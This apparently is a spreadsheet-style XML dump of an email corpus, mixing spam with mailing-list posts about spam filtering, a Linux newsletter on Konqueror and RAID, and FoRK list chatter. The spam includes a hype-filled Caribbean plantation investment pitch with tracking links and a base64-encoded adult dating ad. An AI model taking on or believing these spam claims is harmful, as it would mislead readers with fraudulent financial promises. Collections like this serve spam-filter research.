                                            &lt;p&gt;&lt;img src="http://www.sancristobalsa.net/letter/images/starfish.gif" width="20" height="16"&gt;&amp;nbsp;&amp;nbsp;&lt;font face="verdana, arial" size="2" color="#FFFFFF"&gt;A 20-acre tract of waterfront Caribbean real estate is only $106,000 (including closing costs and dual residency status in a tax-advantaged country).&lt;/font&gt;&lt;/p&gt;
   &lt;font face="verdana, arial" size="2" color="#FFFFFF"&gt;&lt;p&gt;&lt;img src="http://www.sancristobalsa.net/letter/images/starfish.gif" width="20" height="16"&gt;&amp;nbsp;&amp;nbsp;The investment will be totally private and protected from lawsuits.&lt;/p&gt;&lt;/font&gt;
                                                &lt;font face="verdana, arial" size="2" color="#FFFFFF"&gt;&lt;p&gt;&lt;img src="http://www.sancristobalsa.net/letter/images/starfish.gif" width="20" height="16"&gt;&amp;nbsp;&amp;nbsp;The plantation has a proven track record.&lt;/p&gt;&lt;/font&gt;
                                                 &lt;font face="verdana, arial" size="2" color="#FFFFFF"&gt;&lt;p&gt;&lt;img src="http://www.sancristobalsa.net/letter/images/starfish.gif" width="20" height="16"&gt;&amp;nbsp;&amp;nbsp;Total turnkey system is provided - You buy the real estate. The Management Company plants, maintains, and harvests your crop.&amp;nbsp; You deposit the quarterly cash returns.&lt;/p&gt;&lt;/font&gt;
                                             &lt;/UL&gt;
                                         &lt;/TD&gt;
                                     &lt;/TR&gt;
                                 &lt;/TABLE&gt;
                             &lt;/TD&gt;
                         &lt;/TR&gt;
                     &lt;/TABLE&gt;&lt;br&gt;
 &lt;p&gt;We currently have several tracts of Phase II remaining and it is premier property that is planned to overlook the natural marina of an eco resort. There is incredible demand for these tracts and I wanted to give you the first opportunity to participate in this exciting and lucrative project.&lt;/P&gt;
                 &lt;P&gt;Please review the online PowerPoint presentation and I can put you in touch with the principals of the project to answer any questions that you have.&lt;/P&gt;                &lt;P&gt;&lt;A HREF="http://www.sancristobalsa.net/customerppt/index.php?siteID=tom@realpropertymagazine.com"&gt;Click Here to View Presentation&lt;/a&gt;&lt;/P&gt;
                 &lt;P&gt;Please contact me, as soon as possible, so you don't miss out on this offering.&lt;/P&gt;
                 &lt;P&gt;Sincerely yours,&lt;IMG ID="Picture5" SRC="http://www.sancristobalsa.net/images/spacer.gif" width="1" height="1" VSPACE=2 HSPACE=35 ALIGN="RIGHT" BORDER=0 ALT=""&gt;
                 &lt;P&gt;Corporate &lt;BR&gt;Real Property Magazine&lt;BR&gt;Master Broker&lt;BR&gt;San Cristobal Land Development&lt;BR&gt;&lt;A HREF="http://www.sancristobalsa.net/index.php?siteID=tom@realpropertymagazine.com"&gt;&lt;FONT SIZE="-1" FACE="Verdana,Tahoma,Arial,Helvetica,sans-serif"&gt;http://www.sancristobalsa.net/index.php?siteID=tom@realpropertymagazine.com&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
                 &lt;P&gt;&lt;B&gt;PS.&amp;nbsp; If Huge Returns, Rapid Cash Flow, and the Security of Titled Real Estate interest you, contact me, today!&lt;/B&gt;&lt;/P&gt;
                 &lt;P&gt;
 Telephone: 011-507 226-2675&lt;br&gt;Fax: 011-507 226-5884&lt;br&gt;E-mail:&amp;nbsp;&lt;A HREF="mailto:tom@realpropertymagazine.com"&gt;tom@realpropertymagazine.com&lt;/A&gt;&lt;/P&gt;&lt;br&gt;
 Please fill in the form below to request more information:&lt;br&gt;&lt;br&gt;
 &lt;table align="left" border="0" cellpadding="0" cellspacing="0" width="400"&gt;
                     &lt;tr&gt;
                       &lt;td&gt;
 &lt;table align="center" bgcolor="#F1F5F9" border="0" cellpadding="0" cellspacing="0" width="200"&gt;
                     &lt;tr&gt;
                       &lt;td width="10" height="10" valign="top"&gt;&lt;img src="images/upl_corn.gif" width="10" height="10"&gt;&lt;/td&gt;&lt;td valign="top" width="200" height="10" bgcolor="#F1F5F9"&gt;&lt;/td&gt;&lt;td  width="10" height="10" valign="top"&gt;&lt;img src="images/upr_corn.gif" width="10" height="10"&gt;&lt;/td&gt;
                     &lt;/tr&gt;
    &lt;tr&gt;&lt;td width="10" height="80" bgcolor="#F1F5F9"&gt;&lt;/td&gt;&lt;td width="200" height="80" bgcolor="#F1F5F9"&gt;
 &lt;!------FORM--------&gt;
 &lt;form method="post" action="thankyou.php" target="_blank"&gt;
 &lt;table align="center" border="0" cellpadding="0" cellspacing="0" width="210"&gt;
 	&lt;tr&gt;
 	 &lt;td align="right"&gt;&lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#305D9A" size="2"&gt;
 &lt;b&gt;Name: &amp;nbsp;&lt;/b&gt;&lt;/font&gt;
 	 &lt;/td&gt;
 	 &lt;td&gt;&lt;br&gt;
 &lt;input type="text" name="newname" size="15" class="form"&gt;
 	&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 	 &lt;td align="right"&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#305D9A" size="2"&gt;
 &lt;b&gt;Phone: &amp;nbsp;&lt;/b&gt;&lt;/font&gt;
 	 &lt;/td&gt;
 	&lt;td&gt;
 &lt;input type="text" name="newphone" size="15" class="form"&gt;
 	&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 	 &lt;td align="right"&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#305D9A" size="2"&gt;
 &lt;b&gt;E-mail: &amp;nbsp;&lt;/b&gt;&lt;/font&gt;
 	 &lt;/td&gt;
 	&lt;td&gt;
 &lt;input type="text" name="newemail" size="15" class="form"&gt;
 	&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 	 &lt;td colspan="2" align="center"&gt;&lt;br&gt;
 &lt;input type="hidden" name="email" value="tom@realpropertymagazine.com"&gt;
 &lt;input type="submit" name="submit" value="Enter" style="background-color: #F2F5F8"&gt;&lt;br&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/form&gt;
    &lt;/td&gt;&lt;td with="10" height="80" bgcolor="#F1F5F9"&gt;&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;
                       &lt;td width="10" height="10" valign="bottom"&gt;&lt;img src="images/dwl_corn.gif" width="10" height="10"&gt;&lt;/td&gt;&lt;td width="200" height="10" valign="bottom" bgcolor="#F1F5F9"&gt;&lt;/td&gt;&lt;td width="10" height="10" valign="bottom"&gt;&lt;img src="images/dwr_corn.gif" width="10" height="10"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/FONT&gt;&lt;/div&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;
             &lt;/TD&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 To be removed reply with "remove" in the subject line.  Thank you!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</si>
  <si>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At 10:27 PM -0700 on 9/30/02, Mr. FoRK wrote:
 &gt; I realize now, that after reviewing the past several years of work and
 &gt; career, I have been in the wrong business. The wrong business.
 &gt;
 &gt; This is what I should have been doing.
 &gt;
 &gt; http://www.rathergood.com/vikings/
 A New Manual has been published:
 &lt;http://search.barnesandnoble.com/booksearch/isbnInquiry.asp?userid=6T1JTEGKQP&amp;isbn=0140447695&gt;
 Or, the one I read...
  &lt;http://http://search.barnesandnoble.com/booksearch/isbnInquiry.asp?userid=6T1JTEGKQP&amp;isbn=0140441034&gt;
 And, of course, the open source versions...
 http://users.ev1.net/~theweb/njaltoc.htm
 http://sunsite.berkeley.edu/OMACL/Njal/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</si>
  <si>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[Razor-users] Re: many vs one
</t>
  </si>
  <si>
    <t xml:space="preserve">Oates, Isaac wrote:
  &gt; First, 1,000 people will have seen the piece of spam that could've
  &gt; been avoided.  But the other 99,000 will never see that spam.  Evenly
  &gt; distributed, it means that an average user will only see 1% of spam.
  &gt; That's not realistic, because not everyone will get the same spam,
  &gt; but the basic threshold can be adjusted.  At the very least, 30
  &gt; people need to "vote" on a given piece of mail to make a realistic
  &gt; decision.  Since there's no "no" vote mechanism (except
  &gt; revocation--and that's after the fact), only a "yes" vote mechanism
  &gt; exists and so if you received 30 "yes" votes then you could safely
  &gt; say that you got a reasonable sample.
 I'm not sure that I follow your reasoning here. Razor isn't your mail 
 server. It doesn't keep in your mail. You don't request your mail there. 
 Nor do most people check for spam only when they are going to read their 
 mail. My setup check a mail against Razor when my server receives it, 
 not when I'm going to read it. If you wait to get 1000 reply for a mail, 
 it means you have to wait for 1000 people to read it (at least, some 
 people may not vote because they don't want to vote that day or because 
 they don't think it's spam). Knowing that about half the planet would be 
 sleeping (night time) and thus not reading their mail, it would mean 
 that at least 2000 people already received the mail in their inbox. 
 Knowing that, among the people who are not sleeping, not all of them are 
 constantly reading their mail. I would say that less than 1 people over 
 10 read their mail as soon as it arrives. That means that 20,000 people 
 already recieved the mail and checked it against the Razor database 
 before you would get your 1000 votes.
 Also, with your system, 99% is the best you could get. If you wait for 
 only one vote, maybe only 20 guy would read the mail (1 to vote, 10 
 sleeping, and 9 not reading their mail soon enough). Wich gives a value 
 99.98%. That's far better than your 99% don't you think.
 In RealLife(tm), most likely one guy voting won't be enough but the 
 thing is that it will stop the spam as early as possible.
 Also, if for some reason, this mail is one of those people don't agree 
 on whether it is spam or not, it would take a while to revoke those 1000 
 reports, which means that some people may lose this legitimate (to them) 
 mail.
 You mentioned that with this system, people will re-report less often. 
 First, I don't see how waiting *longer* before making a decision on the 
 legitimacy of a mail will reduce re-reporting. The more you wait, the 
 more people will get the mail in their inbox, the more people will see 
 the mail (again, not everybody check their mail against Razor at read 
 time, most do it a reception time using procmail/spamassassin). Second, 
 re-reporting has its use, it increase the confidence that a mail is spam.
 So I don't see what you gain with your 1000 people.
 	Jehan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</si>
  <si>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On Sunday, June 30, 2002, at 12:18 AM, Rohit Khare wrote:
 &gt; You're all invited to join me for a South Bay Hi-Def spectacle at my 
 &gt; apartment in Sunnyvale on the Fourth!
 So here's the final report on the HD/ID party. As no less than TEN 
 forkers pointed out, the invitation, while sent on Sunday 6/30, was only 
 delivered ten days later on 7/9.
 It got flagged as spam.
 Yes, on a mailing list awash in crap -- and some it is even unsolicited 
 commercial email, heavens! -- our trusty mailman filters captured and 
 quarantined just two posts that week, one from me that was &gt; 100K (the 
 fat articles) and one that was bcc:d (the invite).
 Now, it was a little difficult to recalibrate self-esteem, which as you 
 can imagine was proportional to the two-digit attendance  -- in binary!
 According to the George Washington documentary, I almost had as much 
 alcohol on hand than he did -- Virginia tradition being to copiously 
 lubricate each voter. Election day was a public festival day, and it 
 cost poor George an average of SIXTY-FOUR shots of hard liquor PER VOTER 
 that day...
 So, herewith is the prize for most appropriate flame my delayed invite 
 got:
 &gt; 	I unfortunately will have had other plans and thus will
 &gt; 	not be able to have made it.  Yes.
 &gt;
 &gt; 	-faisal
 One of our competitors added:
 &gt; Wow - I just got this now - I guess that was KnowLate!
 And there is no prize for guessing which cold, dark forks emitted these 
 two plaints:
  From Whiny Dwarf:
 &gt; Fix your mail server! just a bit late!
 And Angry Dwarf:
 &gt; God DAAAAAMMMMMNNNNN IIIIITTT! I didn't see your message until now! 
 &gt; Fuck! Fuck! Fuck!
 &gt;
 &gt; We would have been there if I had seen the message before. Kuso! (as 
 &gt; the Japanese would say).
 &gt;
 &gt; Fuck.
 &gt; Fuck.
 &gt; Fuck.
 &gt; Fuck.
 &gt; Fuck.
 &gt; Fuck.
 Perhaps I should remind the latter gently that it was not in any way his 
 fault. The universe *was* out to get him!
 And finally, here's an object lesson for all ye of little faith to learn 
 from my sins:
 &gt; SpamAssassin rated it spam (barely). Gotta stop
 &gt; using those "words and phrases which indicate porn" :-)
 Yes, boys and girls, Mr. Assassin, like Mr. Lott, gets very annoyed if 
 you call the Great American Shrine a... "boob tube"
 :-)
    Rohit
 PS. This is the obscure footnote where I actually hide the bits in this 
 post. What we just encountered here is that an event-processing system 
 with a 10-day RTT cannot be used to reliably handle events more often 
 than once every 20 days. That's why I waited to reply. six bonus points 
 to anyone who can prove this hunch of mine. Hint: try analyzing the 
 problem in frequency-domain.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; From: Stephen D. Williams [mailto:sdw@lig.net]
 &gt; Sent: Monday, September 16, 2002 7:42 PM
 &gt; &gt;1. Which religion and how it is currently being expressed matters.
 &gt; &gt;
 &gt; A)  Which religion is it that can claim no foul actions in its past?
 &gt;  Certainly not Christianity, Islam, etc.
 Hence the qualifier 'current'.
 &gt; B) "How it is currently being expressed" amounts to a tacit
 &gt; acknowledgement that the sophistication of the society involved and
 &gt; people's self-limiting reasonableness are important to avoid primitive
 &gt; expression.  This leads to the point that religion and less
 &gt; sophisticated societies are a dangerous mix.  It also tends to invoke
 &gt; the image of extremes that might occur without diligent maintenance of
 &gt; society.
 The tacit acknowledgement and self-limiting you speak of is not a given
 or a function of 'sophistication' but is primarily a feature of
 (current) Western Civilization.  Of course, 'sophisticated' and 'Western
 Civilization' are essentially equivalent IMHO.  But it need not be so.
 &gt; D) The Northern Ireland Protestant vs. Catholic feud, recently more or
 &gt; less concluded, is not completely unlike this kind of friction
 generated
 &gt; by splitting society too much along religious lines.  One Post article
 &gt; pointed out that the problem basically stemmed from the vertical
 &gt; integration of areas along religious lines all the way to schools,
 &gt; government, political party, etc.  (Of course both cases have a
 heritage
 &gt; of British conquest, but who doesn't?)
 And sometimes the religious component is a faade for an equally
 dangerous ethnic affiliation.  Hindu extremism isn't about the Hindu
 religious theology as far as I can see.  It is a peg to hang an ethnic
 identity and identity politics on.
 Muslim extremism appears to have a far greater connection to theology.
 &gt; 'Northern Ireland is a British province of green valleys and
 &gt; cloud-covered hills whose 1.6 million people are politically and
 &gt; religiously divided. About 54 percent of the population is Protestant,
 &gt; and most Protestants are unionists who want the province to remain
 part
 &gt; of Britain. The Roman Catholic minority is predominantly republican,
 or
 &gt; nationalist; they want to merge with the Republic of Ireland to the
 south.
 Yep, all because the Scots ate oats and starved their Irish out long
 ago, while the English preferred wheat and that doesn't grow so well in
 Ireland.  That and the introduction of potatoes saved the Irish as
 Irish.
 &gt; That's fine, as it would be an inappropriate concentration.  It would
 be
 &gt; difficult to address the issues raised here in a clean way.  I'd be
 &gt; happy with an acknowledgement that the connection is there.
 Oh, I think we are in a war with wide aspects of the Muslim religion.  I
 know it is there, but it just might not be appropriate to admit it
 publicly.
 &gt; &gt;3. US Leadership remains reflexively multi-cultural.
 &gt; &gt;
 &gt; This is ok to a point, as long as it doesn't shy away from logical,
 &gt; objective analysis of when a society could be seriously improved in
 &gt; certain ways.
 I didn't say this was a *good* thing.  With the exception of ethnic
 restaurants, I can generally be counted on to oppose anything labeled
 'multi-cultural'.
 &gt; &gt;I didn't say burning the train was a good thing.  I said I understood
 it
 &gt; &gt;wasn't a spontaneous attack on people who had done no wrong.
 &gt; &gt;
 &gt; 
 &gt; True, although I don't think you were as clear originally.  :-)
 I'm sure I wasn't.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Penguin Shell]  Weekend Warriors
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/penguinshell/20020716.html"&gt;
       http://www.lockergnome.com/issues/penguinshell/20020716.html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&lt;/style&gt;&lt;title&gt;20020716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07.16.2002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I've got a few quick Lockergnome-related notes for you today.&lt;p&gt;
 First, we'd really like to see you in August. I know that Jake, Chris and Randy have been signing off on their newsletters with those few words, and I'll join them. If you didn't experience &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;Gnomedex&lt;/a&gt; last year, you missed, in the words of many industry insiders, "The show of the year." It was unlike any other computer conference I've ever attended. Unlike any conference I've attended, period, computer-related or not. While most such conferences are a huge hustle and hassle, Gnomedex was what computing and Lockergnome are all about - sharing useful information, gathering with like-minded enthusiasts, and learning to use your chosen computer to the fullest extent. No hustle. No hassle. No BS. For the minimal cost of &lt;a href="http://gnomedex.com/registration.php" target="_blank"&gt;registration&lt;/a&gt;, it would be hard to find a better weekend for geeks and wannabes alike. Add to that the schedule of luminaries presenting and attending and you've got the best deal on the planet for computer users. It's hard to believe we're less than a month away - I really do hope to see you there.&lt;p&gt;
 Another Lockergnome innovation has hit the newsstands - err, bookstores. That's right. &lt;a href="http://applecore.lockergnome.com/" target="_blank"&gt;Jake&lt;/a&gt; has release a &lt;b&gt;FREE&lt;/b&gt; &lt;a href="http://www.gnometomes.com/" target="_blank"&gt;GnomeTome&lt;/a&gt; on "Converting Vinyl LPs to CD." Who'd have thought there were so many of you out there that are, well, my age and still in possession of those black slabs of aural heaven. I don't know if Jake's just lost his mind, or what, but free? Get outta here. Go ahead - "Gnome" our servers. Get you copy while you can. And while you're there, check out some of the other killer e-tip books in the GnomeTomes collection.&lt;p&gt;
 Have a great Tuesday.&lt;p&gt;&lt;p&gt;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&lt;b&gt;Setting the Home Page in Konqueror&lt;/b&gt;&lt;p&gt;
 Konqueror, while a great browser, has taken a step in the direction of IE. Like IE, Konqueror is really an integrated web &lt;i&gt;and&lt;/i&gt; file browser. You can use it equally well to view web pages and files on your system. It's been something of a hot debate whether this is actually the proper use of a browser. In fact, Galeon was written specifically to answer this question - it's a web browser and a web broswer only.&lt;p&gt;
 Regardless, it can be a bit annoying to punch the Home button on the Konqueror browser and end up in your /home/&lt;i&gt;user&lt;/i&gt; directory. Have no fear, though. It's an easy change to make your actual web home page the home page in Konqueror.&lt;p&gt;
 Open Konqueror and select Settings from the toolbar. Select "Configure Konqueror," and leave the default selection of "File Manager" as is. In the text box on the right half of the screen, you'll see a tilde in the "Home URL" text box. That just tells Konqueror to use the user's home directory as the home URL. Changing this to a web address will set that address as your home page. Select OK to close the window.&lt;p&gt;
 Taking it one step further, click on the Home button in your Konqueror browser to open your newly-configured web home page. Then, select "Window" and "Save View Profile, 'Web Browsing.'" This will futher save the URL and allow your the opportunity to save the window size when the browser opens.&lt;p&gt;
 Konqueror is more than just a web browser. But, it's not so tough to make it act like a pure web browser if you just know where to look.&lt;p&gt;&lt;p&gt;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XII&lt;/b&gt;&lt;p&gt;
 Depending on who you talk to, RAID can stand for "Redundant Array of Independent Discs" or "Redundant Array of Inexpensive Discs." No matter. They both point to the same theory and practice in Linux; data storage redundancy. That's today's kernel configuration section - Multi-Device Support.&lt;p&gt;
 Let's talk first about the principles behind a RAID setup. RAID uses multiple discs for speed, increased data storage, or data redundancy. Fundamentally, there are 5 levels of RAID in Linux; Linear, RAID-0, RAID-1, RAID-4, and RAID-5.&lt;p&gt;
 Linear RAID uses two or more discs, appending data from one to another. In other words, when disc 1 is full, disc 2 steps in to store data. There is no redundancy in Linear RAID - only an increase in storage capacity. Further, there's no marked increase in data access speed because you're accessing one drive in the RAID array at a time.&lt;p&gt;
 RAID-0 "stripes" data across the RAID drives. Some data will be written to the first drive, some to the second, etc. Like Linear RAID, RAID-0 provides no redundancy. Because the data has been written in parallel across the drives, not all data exists on all drives. Lose a drive and your data is gone. RAID-0 will, however, decrease data access time. Your system will run more quickly.&lt;p&gt;
 RAID-1, unlike Linear and RAID-0, &lt;i&gt;does&lt;/i&gt; provide data redundancy. This is the first level in which data is "mirrored" across the drives in the RAID array. All data that exists on one drive exists on all the others. RAID-1 requires at least two drives and they should be of equal size, otherwise, your overall RAID array will be the size of the smallest drive. Performance with RAID-1 can actually be slower than with a single drive or RAID-0, as all the data is written across multiple discs.&lt;p&gt;
 RAID-4 is, for the most part, pretty useless. It reserves one disc for &lt;a href="http://wombat.doc.ic.ac.uk/foldoc/foldoc.cgi?query=parity" target="_blank"&gt;parity&lt;/a&gt; information while striping the data across the others. This is much like Linear mode, with an additional disc thrown in for parity data. Parity data &lt;i&gt;can&lt;/i&gt; be used to reconstruct and retrieve the data on the other drives, but this really isn't a redundant method of data storage. Consequently, RAID-4 is probably the least used of the RAID schemes.&lt;p&gt;
 RAID-5 is designed for 3 or more discs and provides both redundancy and speed. Like RAID-4, RAID-5 pays close attention to parity data. However, rather than reserving a device in the RAID array for this data, it's written across the array. Because the parity data is written across the array, data recovery can be accomplished fairly quickly. In fact, using a "spare disc" configuration will allow RAID-5 to reconstruct the data to the spare disc immediately after the failure of a drive. Because of it's increased speed and redundancy, RAID-5 is probably the most common setup for multiple storage devices.&lt;p&gt;
 With all that in mind, you'll need to make a choice in your kernel configuration. Do you have mutliple drives of the same size that you'd like to configure as a RAID array? The Multi-Device Support section of the kernel configuration will allow you to do this. In fact, you'll be able to set the RAID level, as well. Again, evaluate your needs and select the appropriate option.&lt;p&gt;
 Tomorrow, it's on to networking options in your kernel configuration.&lt;p&gt;&lt;p&gt;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&lt;b&gt;SaveMyModem&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href=""&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" href="http://web.genie.it/utenti/g/gareuselesinge/smm/"&gt;http://web.genie.it/utenti/g/gareuselesinge/smm/&lt;/a&gt;&lt;p&gt;
 "SaveMyModem is an anti-spam, mail-shaping, and delete-on-server mail tool. It is designed for users with slow dialup connections, who are tired of downloading large amounts of spam and worm and virus attachments."&lt;p&gt;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&lt;b&gt;Windows Apps in Linux?&lt;/b&gt;&lt;br&gt;
 &lt;span class="url"&gt;Scribbled by Robert Nix&lt;/span&gt;&lt;p&gt;
 "Nice coverage but I don't give a flip about Office. OpenOffice is fine
 for my needs.&lt;p&gt;
 "What I really want is to run Quicken (at least v.2001) which is the only
 app keeping me running Windows (using vmware). I've tried Quicken on Mac
 OS X and it is grossly inadequate and on Linux with Wine and have so far
 been unsuccessful even using tips from
 http://appdb.codeweavers.com/appview.php?appId=107. I hope that GnuCash
 will eventually support the online features I enjoy but that doesn't
 help now.&lt;p&gt;
 "The reason I'm writing this is that I personally think Office products
 are overrated for home users, at least now that there are several native
 alternatives. For home users, finance apps are the key issue now. Do a
 section on getting Quicken to run in Wine and I'll declare you a god. :)"&lt;p&gt;&lt;p&gt;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&lt;b&gt;Important Unix Manpages&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://home.ins.de/~m.hussmann/man/"&gt;http://home.ins.de/~m.hussmann/man/&lt;/a&gt;&lt;p&gt;
 Manpages are an important part of Linux use. Armed with the proper knowledge and manpage, there are few sticky situations in Linux that can't be solved quickly. Though they can be a bit cryptic at times, manpages are really a Linux newbie's best friend.&lt;p&gt;
 Important Unix Manpages is a compilation of help for situations that actually have little to do with programming. They're more human interface problems than machine interface problems. This page just points out that if life was like Linux, we'd all be a lot happier.&lt;p&gt;&lt;p&gt;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href="http://www.lockergnome.com/issues/penguinshell/20020716.html"&gt;http://www.lockergnome.com/issues/penguinshell/20020716.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org]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</si>
  <si>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Thu, 25 Jul 2002 18:33:15 -0700 skrev du:
 &gt;  Not sure what you're asking.
 I just want to be sure, that forwarding an email to my own spamtrap address
 which performs a razor-report on the entire received email is not waste of
 time, because the contents of the forwarded email is not recognized as equal
 to the email originally received. The forwarded email has a new set of
 headerlines, which should be discarded and instead the headerlines of the
 original message are in the body of this new message and should be recognized
 as such and treated properly.
 An ordinary Forward Unquoted in Agent is subject to character set conversions
 and does not depict the received spam in its original form.
 I hope this clarifies my concerns.
 - Jrgen
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Adult Ads
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00A2_25A50A3E.D1003C25
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PEhUTUw+DQo8SEVBRD4NCiAgIA0KICAgPFRJVExFPk1hcnJpZWQgQnV0IExv
 bmVseTwvVElUTEU+DQo8L0hFQUQ+DQo8Qk9EWSBCR0NPTE9SPSIjRkZGRkZG
 IiBMSU5LPSIjRkYwMDAwIiBWTElOSz0iI0ZGMDAwMCIgQUxJTks9IiNGRjAw
 MDAiPg0KDQo8UCBBTElHTj0iY2VudGVyIj4gPElNRyBCT1JERVI9IjAiIFNS
 Qz0iaHR0cDovL3d3dy5wYWdlNGxpZmUub3JnL3VzZXJzL3h4eGRhdGluZy9t
 YXJyaWVkYW5kbG9uZWx5L2ltYWdlcy9sb2dvLmpwZyIgV0lEVEg9IjUwMCIg
 SEVJR0hUPSIxOTEiPiZuYnNwOyAmbmJzcDsgPC9QPg0KPENFTlRFUj4NCiAg
 PFRBQkxFIENFTExTUEFDSU5HPTUgQ0VMTFBBRERJTkc9NSBCR0NPTE9SPSIj
 NjY2Njk5IiA+DQogICAgPFRSPg0KPFREPjxJTUcgU1JDPSJodHRwOi8vd3d3
 LnBhZ2U0bGlmZS5vcmcvdXNlcnMveHh4ZGF0aW5nL21hcnJpZWRhbmRsb25l
 bHkvcDcwNi5qcGciIEJPUkRFUj0wIEhFSUdIVD0xODAgV0lEVEg9MTIwPjwv
 VEQ+DQoNCjxURD48SU1HIFNSQz0iaHR0cDovL3d3dy5wYWdlNGxpZmUub3Jn
 L3VzZXJzL3h4eGRhdGluZy9tYXJyaWVkYW5kbG9uZWx5L3A3MDQuanBnIiBC
 T1JERVI9MCBIRUlHSFQ9MTgwIFdJRFRIPTEyMD48L1REPg0KDQo8VEQ+PElN
 RyBTUkM9Imh0dHA6Ly93d3cucGFnZTRsaWZlLm9yZy91c2Vycy94eHhkYXRp
 bmcvbWFycmllZGFuZGxvbmVseS9wNzA1LmpwZyIgQk9SREVSPTAgSEVJR0hU
 PTE4MCBXSURUSD0xMjA+PC9URD4NCg0KPFREPjxJTUcgU1JDPSJodHRwOi8v
 d3d3LnBhZ2U0bGlmZS5vcmcvdXNlcnMveHh4ZGF0aW5nL21hcnJpZWRhbmRs
 b25lbHkvcDExOTliLmdpZiIgQk9SREVSPTAgSEVJR0hUPTE4MCBXSURUSD0x
 MjA+PC9URD4NCjwvVFI+DQo8L1RBQkxFPjwvQ0VOVEVSPg0KDQo8QlI+Jm5i
 c3A7DQo8Q0VOVEVSPjxUQUJMRSBDT0xTPTEgV0lEVEg9IjUwMCIgSEVJR0hU
 PSI2MDAiID4NCjxUUj4NCjxURD48Rk9OVCBDT0xPUj0iI0ZGNjY2NiI+PEEg
 SFJFRj0iaHR0cDovL3d3dy5wYWdlNGxpZmUub3JnL3VzZXJzL3h4eGRhdGlu
 Zy9tYXJyaWVkYW5kbG9uZWx5L3ByZXZpZXcuaHRtIj5FTlRFUg0KVEhFIFdP
 UkxEIEZBTU9VUzwvQT4gPC9GT05UPjxGT05UIFNJWkU9IjYiIENPTE9SPSIj
 RkYwMEZGIj5NYXJyaWVkIEJ1dCBMb25lbHk8L0ZPTlQ+PEI+PEk+PEZPTlQg
 Q09MT1I9IiNGRjAwRkYiIFNJWkU9IjUiPiE8L0ZPTlQ+PC9JPjwvQj48Rk9O
 VCBDT0xPUj0iI0ZGMDBGRiI+DQo8L0ZPTlQ+DQo8VUw+DQo8TEk+DQpBIHdv
 cmxkd2lkZSBub24tcHJvZml0IG9yZ2FuaXphdGlvbiBmb3VuZGVkIGFuZCBt
 YW5hZ2VkIGV4Y2x1c2l2ZWx5IGJ5DQp3b21lbjwvTEk+DQoNCjxMST4NCkZl
 YXR1cmluZyBvbmx5IFJFQUwgYXR0YWNoZWQgd29tZW4gaW4gc2VhcmNoIG9m
 IFJFQUwgU2V4IE9uIFRoZSBTaWRlIG5hdGlvbndpZGUNCmFuZCBpbiAyMCBj
 b3VudHJpZXM8L0xJPg0KDQo8TEk+DQpCYXNlZCBpbiBMb3MgQW5nZWxlcywg
 Q2FsaWZvcm5pYTogVGhlIFdvcmxkIENhcGl0YWwgZm9yIFNleCBPbiBUaGUg
 U2lkZSZuYnNwOzwvTEk+DQo8L1VMPg0KPEZPTlQgQ09MT1I9IiNGRjAwMDAi
 PkZBQ1Q6PC9GT05UPg0KPFVMPg0KPExJPg0KT3ZlciAyNyBNaWxsaW9uIHZp
 c2l0b3JzIGluIGxlc3MgdGhhbiAyIHllYXJzIHdpdGhvdXQgYW55IGNvbW1l
 cmNpYWwgYWR2ZXJ0aXNpbmcNCm1lYW5zLiAiVGhlIHdvcmQgc3ByZWFkcyBm
 YXN0Ii48L0xJPg0KPC9VTD4NCiZuYnNwOzxGT05UIENPTE9SPSIjRkYwMDAw
 Ij5MRUdBTCBOT1RJQ0U8L0ZPTlQ+DQo8VUw+DQo8TEk+DQpUaGlzIHNpdGUg
 Y29udGFpbnMgYWR1bHQgb3JpZW50ZWQgbWF0ZXJpYWwuIElmIHlvdSBmaW5k
 IHRoaXMgbWF0ZXJpYWwgdG8NCmJlIG9mZmVuc2l2ZSBvciBhcmUgdW5kZXIg
 dGhlIGFnZSBvZiAxOCB5ZWFycyAob3IgMjEgeWVhcnMgZGVwZW5kaW5nIG9u
 DQpsb2NhbCBsYXdzKSwgb3IgaXQgaXMgaWxsZWdhbCB3aGVyZSB5b3UgYXJl
 LCB0aGVuIHlvdSBtdXN0IExFQVZFIHRoaXMgc2l0ZQ0KTk9XISZuYnNwOzwv
 TEk+DQoNCjxMST4NCkJ5IGVudGVyaW5nIHRoaXMgc2l0ZSB5b3UgZGVjbGFy
 ZSB1bmRlciBwZW5hbHR5IG9mIHBlcmp1cnkgdGhhdCB5b3UgYXJlDQphYm92
